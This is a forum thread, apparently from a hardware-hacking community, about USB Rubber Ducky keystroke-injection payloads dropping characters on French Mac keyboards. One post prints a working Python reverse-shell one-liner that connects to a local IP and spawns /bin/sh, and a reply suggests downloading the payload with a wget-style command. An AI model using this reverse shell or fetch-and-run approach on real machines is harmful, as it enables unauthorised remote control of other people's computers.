Some chars doesn't work (Mac OS)

Guest RemovedUser

Guest RemovedUser

Hi guys !

I've just received my Rubber Ducky.

I successfully managed to upgrade the firmware to the Duck 2.1 and change my VID/PID to skip the keyboard setup assistant on a mac.

I've tried to use the osx user backdoor (reverse shell) payload, encode it with duck toolkit online and select "Français MAC" as language (i'm working on an azerty macbook pro). Everything seems to be okay (no azerty/qwerty problem), except one thing : the ~ character does not print.

Somebody does have an idea?

• 2 weeks later...

Hi guys !

I successfully managed to upgrade the firmware to the Duck 2.1 and change my VID/PID to skip the keyboard setup assistant on a mac.

I've tried to use the osx user backdoor (reverse shell) payload, encode it with duck toolkit online and select "Français MAC" as language (i'm working on an azerty macbook pro). Everything seems to be okay (no azerty/qwerty problem), except one thing : the ~ character does not print.

Hey Mideuger! Patrick Mosca made a video using his own method for rooting a mac in 10 seconds (reverse shell method) similar to what I believe you are trying to do. Here is the link, hopefully it will help you. Root a Mac in less then 10 seconds

I also recently got my Rubber Ducky, and I am able to write payloads and encode them onto the Ducky just fine. I am having trouble updating the firmware and changing my VIP/PID however, and was hoping that you might explain how you were able to successfully do that.

I have a forum here regarding this issue: My Forum

Any help would be appreciated! Thanks!

• 2 weeks later...

Hi guys !

Same problem here with a french mac keyboard.

I have encoded my ducky script with the ressource frmac.properties.

Here is what my ducky writes :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.0.37,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(q/bin/sh,-iq);'

Here is what I have in my script :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.37",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

If you can't specifically type characters and you don't want to risk flashing the duck and the firmware, you could always use command space, type "Terminal" and use a WGet like command. That would download the file meaning no need to type everything out! Quick and simple.